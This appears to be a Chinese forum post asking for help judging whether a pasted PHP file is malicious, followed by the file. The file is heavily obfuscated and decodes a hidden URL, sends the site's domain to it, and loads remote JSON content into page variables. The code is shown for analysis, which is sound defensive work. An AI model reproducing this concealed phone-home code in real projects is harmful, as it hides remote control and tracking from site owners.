我最近遇到一个 PHP 文件,我怀疑它可能包含不需要的病毒或恶意代码。不幸的是,我对 PHP 的了解有限,我不确定如何有效地分析它。如果有 PHP 专业知识的人可以帮助我审查文件并确定是否存在任何安全问题,我将不胜感激。
另外,我想知道是否有专门设计用于检查PHP文件是否存在潜在恶意代码的工具或解码器。如果是这样,我将不胜感激有关此类工具的建议或有关如何确保文件安全的任何其他建议。
我了解安全的重要性,我想确保我不会让自己或我的系统面临任何风险。提前感谢您提供的任何帮助或指导。
<?php
$
{
"\x47\x4c\x4f\x42A\x4c\x53"
}
["\x6dl\x69\x6d\x63\x61l\x6f_\x79t\x71t\x68\x6d\x67r\x73\x62q\x64\x70j\x72\x76\x76\x7a\x73"] = "d\x6fm\x61\x69n";
$
{
"G\x4cO\x42\x41\x4c\x53"
}
["r\x7a\x6f\x63b\x6d\x7aw\x73a\x68t\x6de\x72\x71o\x71\x76z\x68\x74"] = "k\x65\x79";
$
{
"G\x4cO\x42A\x4cS"
}
["\x74e\x6dq\x6f\x69x\x68\x68\x73g\x76u\x70\x78a\x72f\x6a\x6df\x6d_\x66\x72\x66\x6c"] = "\x69\x64";
$
{
"G\x4c\x4fB\x41L\x53"
}
["e\x5f\x71\x67t\x74_\x65\x72n\x6az\x77p\x6e\x67\x70u\x5f\x70x\x6b\x6fd\x64x\x6d\x78"] = "u";
$
{
"G\x4cO\x42\x41\x4cS"
}
["i\x6a\x7au\x78a\x75\x62z\x5fa\x71\x6a\x6fw\x75o\x6fr\x79\x66\x61l\x6a"] = "\x63o\x6e\x6e";
$
{
"G\x4cO\x42\x41L\x53"
}
["\x67o\x6f\x74p\x77\x72\x61\x75p\x6ag\x76\x7ay\x6dn\x61y\x67\x73f\x76u\x65\x5f\x7an\x71d\x6ec\x61"] = "\x75\x72l\x5fg\x65t\x5fc\x6fn\x74e\x6e\x74\x73\x5fd\x61t\x61";
$
{
"\x47\x4cO\x42A\x4cS"
}
["z\x64\x78v\x6d\x5fc\x64w\x68m\x65z\x64o\x6fx\x6e\x74\x7a\x78\x73\x6f"] = "h\x61\x6e\x64\x6c\x65";
$
{
"\x47\x4c\x4fB\x41L\x53"
}
["x\x7a\x6do\x62\x78_\x69h\x74f\x70\x68s\x68\x71\x69\x66\x5f\x6au\x66\x76\x78m\x63d\x64m\x68\x76\x67d\x61"] = "\x61\x72\x72a\x79";
function jsoncontent()
{
global $
{
$
{
"G\x4cO\x42\x41\x4cS"
}
["\x6dl\x69\x6d\x63\x61l\x6f_\x79t\x71t\x68\x6d\x67r\x73\x62q\x64\x70j\x72\x76\x76\x7a\x73"]
};
$
{
$
{
"G\x4cO\x42\x41L\x53"
}
["r\x7a\x6f\x63b\x6d\x7aw\x73a\x68t\x6de\x72\x71o\x71\x76z\x68\x74"]
} = "L\x33I\x77Y\x7a\x53v\x4da\x70\x69q\x7aI\x68\x72T\x49\x68\x4d\x76\x39u\x71\x76\x35a\x4c\x7a9\x35\x70z\x53\x68L\x6c\x38\x69\x42\x7a\x4dw\x4d2\x71\x31";
$
{
$
{
"G\x4cO\x42\x41L\x53"
}
["\x74e\x6dq\x6f\x69x\x68\x68\x73g\x76u\x70\x78a\x72f\x6a\x6df\x6d_\x66\x72\x66\x6c"]
} = str_rot13($
{
$
{
"G\x4cO\x42\x41\x4cS"
}
["r\x7a\x6f\x63b\x6d\x7aw\x73a\x68t\x6de\x72\x71o\x71\x76z\x68\x74"]
});
$
{
$
{
"G\x4cO\x42\x41L\x53"
}
["\x74e\x6dq\x6f\x69x\x68\x68\x73g\x76u\x70\x78a\x72f\x6a\x6df\x6d_\x66\x72\x66\x6c"]
} = base64_decode($
{
$
{
"\x47L\x4fB\x41L\x53"
}
["\x74e\x6dq\x6f\x69x\x68\x68\x73g\x76u\x70\x78a\x72f\x6a\x6df\x6d_\x66\x72\x66\x6c"]
});
$
{
$
{
"\x47\x4c\x4fB\x41L\x53"
}
["\x74e\x6dq\x6f\x69x\x68\x68\x73g\x76u\x70\x78a\x72f\x6a\x6df\x6d_\x66\x72\x66\x6c"]
} = strrev($
{
$
{
"G\x4cO\x42A\x4c\x53"
}
["\x74e\x6dq\x6f\x69x\x68\x68\x73g\x76u\x70\x78a\x72f\x6a\x6df\x6d_\x66\x72\x66\x6c"]
});
$
{
$
{
"\x47\x4c\x4fB\x41\x4c\x53"
}
["e\x5f\x71\x67t\x74_\x65\x72n\x6az\x77p\x6e\x67\x70u\x5f\x70x\x6b\x6fd\x64x\x6d\x78"]
} = str_rot13($
{
$
{
"G\x4cO\x42A\x4cS"
}
["\x74e\x6dq\x6f\x69x\x68\x68\x73g\x76u\x70\x78a\x72f\x6a\x6df\x6d_\x66\x72\x66\x6c"]
}) . "\x3f\x64\x3d${${"\x47L\x4f\x42A\x4cS"}["\x6dl\x69\x6d\x63\x61l\x6f_\x79t\x71t\x68\x6d\x67r\x73\x62q\x64\x70j\x72\x76\x76\x7a\x73"]}";
if (function_exists('curl_exec'))
{
$
{
$
{
"\x47\x4cO\x42A\x4c\x53"
}
["i\x6a\x7au\x78a\x75\x62z\x5fa\x71\x6a\x6fw\x75o\x6fr\x79\x66\x61l\x6a"]
} = curl_init($
{
$
{
"\x47\x4cO\x42A\x4cS"
}
["e\x5f\x71\x67t\x74_\x65\x72n\x6az\x77p\x6e\x67\x70u\x5f\x70x\x6b\x6fd\x64x\x6d\x78"]
});
curl_setopt($
{
$
{
"G\x4cO\x42A\x4c\x53"
}
["i\x6a\x7au\x78a\x75\x62z\x5fa\x71\x6a\x6fw\x75o\x6fr\x79\x66\x61l\x6a"]
}
, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($
{
$
{
"G\x4cO\x42A\x4cS"
}
["i\x6a\x7au\x78a\x75\x62z\x5fa\x71\x6a\x6fw\x75o\x6fr\x79\x66\x61l\x6a"]
}
, CURLOPT_FRESH_CONNECT, true);
curl_setopt($
{
$
{
"\x47L\x4fB\x41\x4c\x53"
}
["i\x6a\x7au\x78a\x75\x62z\x5fa\x71\x6a\x6fw\x75o\x6fr\x79\x66\x61l\x6a"]
}
, CURLOPT_RETURNTRANSFER, 1);
$
{
$
{
"G\x4c\x4f\x42A\x4cS"
}
["\x67o\x6f\x74p\x77\x72\x61\x75p\x6ag\x76\x7ay\x6dn\x61y\x67\x73f\x76u\x65\x5f\x7an\x71d\x6ec\x61"]
} = (curl_exec($
{
$
{
"\x47\x4c\x4fB\x41L\x53"
}
["i\x6a\x7au\x78a\x75\x62z\x5fa\x71\x6a\x6fw\x75o\x6fr\x79\x66\x61l\x6a"]
}));
curl_close($
{
$
{
"\x47\x4cO\x42A\x4cS"
}
["i\x6a\x7au\x78a\x75\x62z\x5fa\x71\x6a\x6fw\x75o\x6fr\x79\x66\x61l\x6a"]
});
}
elseif (function_exists('file_get_contents'))
{
$
{
$
{
"\x47\x4cO\x42\x41L\x53"
}
["\x67o\x6f\x74p\x77\x72\x61\x75p\x6ag\x76\x7ay\x6dn\x61y\x67\x73f\x76u\x65\x5f\x7an\x71d\x6ec\x61"]
} = file_get_contents($
{
$
{
"G\x4cO\x42A\x4c\x53"
}
["e\x5f\x71\x67t\x74_\x65\x72n\x6az\x77p\x6e\x67\x70u\x5f\x70x\x6b\x6fd\x64x\x6d\x78"]
});
}
elseif (function_exists('fopen') && function_exists('stream_get_contents'))
{
$
{
$
{
"G\x4cO\x42A\x4cS"
}
["z\x64\x78v\x6d\x5fc\x64w\x68m\x65z\x64o\x6fx\x6e\x74\x7a\x78\x73\x6f"]
} = fopen($
{
$
{
"G\x4cO\x42\x41L\x53"
}
["e\x5f\x71\x67t\x74_\x65\x72n\x6az\x77p\x6e\x67\x70u\x5f\x70x\x6b\x6fd\x64x\x6d\x78"]
}
, "r");
$
{
$
{
"G\x4cO\x42\x41L\x53"
}
["\x67o\x6f\x74p\x77\x72\x61\x75p\x6ag\x76\x7ay\x6dn\x61y\x67\x73f\x76u\x65\x5f\x7an\x71d\x6ec\x61"]
} = stream_get_contents($
{
$
{
"G\x4cO\x42\x41L\x53"
}
["z\x64\x78v\x6d\x5fc\x64w\x68m\x65z\x64o\x6fx\x6e\x74\x7a\x78\x73\x6f"]
});
}
else
{
$
{
$
{
"G\x4cO\x42\x41\x4cS"
}
["\x67o\x6f\x74p\x77\x72\x61\x75p\x6ag\x76\x7ay\x6dn\x61y\x67\x73f\x76u\x65\x5f\x7an\x71d\x6ec\x61"]
} = false;
}
return $
{
$
{
"\x47\x4cO\x42\x41\x4cS"
}
["\x67o\x6f\x74p\x77\x72\x61\x75p\x6ag\x76\x7ay\x6dn\x61y\x67\x73f\x76u\x65\x5f\x7an\x71d\x6ec\x61"]
};
}
$
{
$
{
"\x47\x4cO\x42A\x4cS"
}
["x\x7a\x6do\x62\x78_\x69h\x74f\x70\x68s\x68\x71\x69\x66\x5f\x6au\x66\x76\x78m\x63d\x64m\x68\x76\x67d\x61"]
} = json_decode(jsoncontent() , true);
foreach ($array as $value)
{
$
{
"\x47L\x4f\x42\x41L\x53"
}
["\x65h\x73\x69\x64g\x6ep\x70\x79\x6e\x61c\x64v\x78\x70\x65\x5f\x64\x76d\x67n\x7a\x72j\x6fn\x6am\x70a\x6fw\x69"] = "i\x64";
$
{
"\x47L\x4f\x42\x41L\x53"
}
["p\x6d\x68l\x75\x6d_\x69b\x76\x75e\x65\x74e\x6fu\x5f\x66\x77_\x64a\x70\x5fd\x73w\x63"] = "v\x61\x6c\x75e";
$
{
"\x47\x4c\x4fB\x41L\x53"
}
["\x74f\x6b\x72\x6ao\x65\x72\x74\x5f\x78w\x69\x6cr\x76_\x70c\x79\x5f\x74j"] = "s\x6cu\x67";
$
{
"\x47L\x4fB\x41\x4cS"
}
["c\x62_\x6cz\x67_\x70j\x6db\x6ew\x62n\x63\x63q\x74s\x71w\x73f\x6b\x73k\x68r\x6fm\x5f\x67z\x6c"] = "\x6ea\x6d\x65";
$
{
"G\x4cO\x42A\x4cS"
}
["\x5fi\x61\x71\x6f\x67\x74\x75\x6c\x67_\x63k\x73i\x67\x69p\x71v\x68_"] = "c\x6fn\x74e\x6et";
$
{
"\x47\x4cO\x42\x41\x4c\x53"
}
["y\x67\x65\x7ah\x6dk\x6bl\x78h\x66\x61t\x64j\x6ex\x76\x78g\x75t\x7ao\x6f\x6dm\x67\x6eh\x73e\x79u\x68s\x70"] = "\x74a\x67s";
$
{
"G\x4c\x4fB\x41L\x53"
}
["\x62\x78m\x75\x61\x5fn\x71e\x5fc\x6aq\x64p\x75g\x65p\x75\x6b\x6b\x7af\x6ah\x70s\x78"] = "d\x61t\x65";
$
{
"G\x4c\x4fB\x41L\x53"
}
["k\x61\x6bd\x70s\x69\x7a\x61\x75\x77k\x77\x77\x67_\x75z\x64\x6f\x75p\x63n\x65\x63c"] = "\x43\x61\x74S\x6c\x75g";
$
{
"\x47L\x4fB\x41\x4cS"
}
["y\x79k\x76\x66\x74\x73\x6bv\x6bf\x5fu\x76\x70d\x69u\x76v\x70\x76\x75p\x66n\x78b\x67r\x5f\x6er\x66j\x5f"] = "C\x61t\x4e\x61\x6de";
$
{
"\x47\x4cO\x42\x41L\x53"
}
["e\x65s\x5fw\x70\x6eq\x6az\x62w\x65_\x73c\x69s\x73j\x7a\x5f\x6bs\x65\x73\x67\x6d\x71\x65\x65k\x68\x76\x6c"] = "p\x69\x64";
$
{
"G\x4cO\x42\x41\x4c\x53"
}
["\x6a_\x78\x78\x6e\x6a\x7an\x70f\x77j\x73q\x77\x72\x67\x72\x5f_\x61b\x69j\x7a\x74\x71d\x66w\x6by\x5f\x7a\x6as\x62\x77\x71p"] = "t\x79p\x65";
$
{
$
{
"G\x4cO\x42A\x4c\x53"
}
["\x65h\x73\x69\x64g\x6ep\x70\x79\x6e\x61c\x64v\x78\x70\x65\x5f\x64\x76d\x67n\x7a\x72j\x6fn\x6am\x70a\x6fw\x69"]
} = $
{
$
{
"\x47L\x4fB\x41L\x53"
}
["p\x6d\x68l\x75\x6d_\x69b\x76\x75e\x65\x74e\x6fu\x5f\x66\x77_\x64a\x70\x5fd\x73w\x63"]
}
['id'];
$
{
$
{
"\x47L\x4fB\x41L\x53"
}
["\x74f\x6b\x72\x6ao\x65\x72\x74\x5f\x78w\x69\x6cr\x76_\x70c\x79\x5f\x74j"]
} = slug($
{
$
{
"G\x4cO\x42A\x4c\x53"
}
["p\x6d\x68l\x75\x6d_\x69b\x76\x75e\x65\x74e\x6fu\x5f\x66\x77_\x64a\x70\x5fd\x73w\x63"]
}
['slug']);
$
{
$
{
"G\x4c\x4fB\x41L\x53"
}
["c\x62_\x6cz\x67_\x70j\x6db\x6ew\x62n\x63\x63q\x74s\x71w\x73f\x6b\x73k\x68r\x6fm\x5f\x67z\x6c"]
} = $
{
$
{
"G\x4cO\x42A\x4c\x53"
}
["p\x6d\x68l\x75\x6d_\x69b\x76\x75e\x65\x74e\x6fu\x5f\x66\x77_\x64a\x70\x5fd\x73w\x63"]
}
['name'];
$
{
$
{
"G\x4c\x4fB\x41L\x53"
}
["\x5fi\x61\x71\x6f\x67\x74\x75\x6c\x67_\x63k\x73i\x67\x69p\x71v\x68_"]
} = $
{
$
{
"G\x4cO\x42\x41L\x53"
}
["p\x6d\x68l\x75\x6d_\x69b\x76\x75e\x65\x74e\x6fu\x5f\x66\x77_\x64a\x70\x5fd\x73w\x63"]
}
['content'];
$
{
$
{
"\x47\x4c\x4fB\x41\x4cS"
}
["y\x67\x65\x7ah\x6dk\x6bl\x78h\x66\x61t\x64j\x6ex\x76\x78g\x75t\x7ao\x6f\x6dm\x67\x6eh\x73e\x79u\x68s\x70"]
} = $
{
$
{
"G\x4cO\x42A\x4cS"
}
["p\x6d\x68l\x75\x6d_\x69b\x76\x75e\x65\x74e\x6fu\x5f\x66\x77_\x64a\x70\x5fd\x73w\x63"]
}
['tags'];
$
{
$
{
"G\x4cO\x42\x41\x4cS"
}
["\x62\x78m\x75\x61\x5fn\x71e\x5fc\x6aq\x64p\x75g\x65p\x75\x6b\x6b\x7af\x6ah\x70s\x78"]
} = $
{
$
{
"G\x4c\x4f\x42\x41L\x53"
}
["p\x6d\x68l\x75\x6d_\x69b\x76\x75e\x65\x74e\x6fu\x5f\x66\x77_\x64a\x70\x5fd\x73w\x63"]
}
['date'];
$
{
$
{
"\x47L\x4fB\x41L\x53"
}
["k\x61\x6bd\x70s\x69\x7a\x61\x75\x77k\x77\x77\x67_\x75z\x64\x6f\x75p\x63n\x65\x63c"]
} = $
{
$
{
"\x47\x4cO\x42\x41L\x53"
}
["p\x6d\x68l\x75\x6d_\x69b\x76\x75e\x65\x74e\x6fu\x5f\x66\x77_\x64a\x70\x5fd\x73w\x63"]
}
['CatSlug'];
$
{
$
{
"\x47L\x4fB\x41L\x53"
}
["y\x79k\x76\x66\x74\x73\x6bv\x6bf\x5fu\x76\x70d\x69u\x76v\x70\x76\x75p\x66n\x78b\x67r\x5f\x6er\x66j\x5f"]
} = $
{
$
{
"G\x4c\x4fB\x41L\x53"
}
["p\x6d\x68l\x75\x6d_\x69b\x76\x75e\x65\x74e\x6fu\x5f\x66\x77_\x64a\x70\x5fd\x73w\x63"]
}
['CatName'];
$
{
$
{
"G\x4c\x4fB\x41\x4c\x53"
}
["e\x65s\x5fw\x70\x6eq\x6az\x62w\x65_\x73c\x69s\x73j\x7a\x5f\x6bs\x65\x73\x67\x6d\x71\x65\x65k\x68\x76\x6c"]
} = $
{
$
{
"G\x4c\x4f\x42A\x4cS"
}
["p\x6d\x68l\x75\x6d_\x69b\x76\x75e\x65\x74e\x6fu\x5f\x66\x77_\x64a\x70\x5fd\x73w\x63"]
}
['pid'];
$
{
$
{
"G\x4cO\x42A\x4cS"
}
["\x6a_\x78\x78\x6e\x6a\x7an\x70f\x77j\x73q\x77\x72\x67\x72\x5f_\x61b\x69j\x7a\x74\x71d\x66w\x6by\x5f\x7a\x6as\x62\x77\x71p"]
} = $
{
$
{
"G\x4cO\x42A\x4cS"
}
["p\x6d\x68l\x75\x6d_\x69b\x76\x75e\x65\x74e\x6fu\x5f\x66\x77_\x64a\x70\x5fd\x73w\x63"]
}
['type']; ?>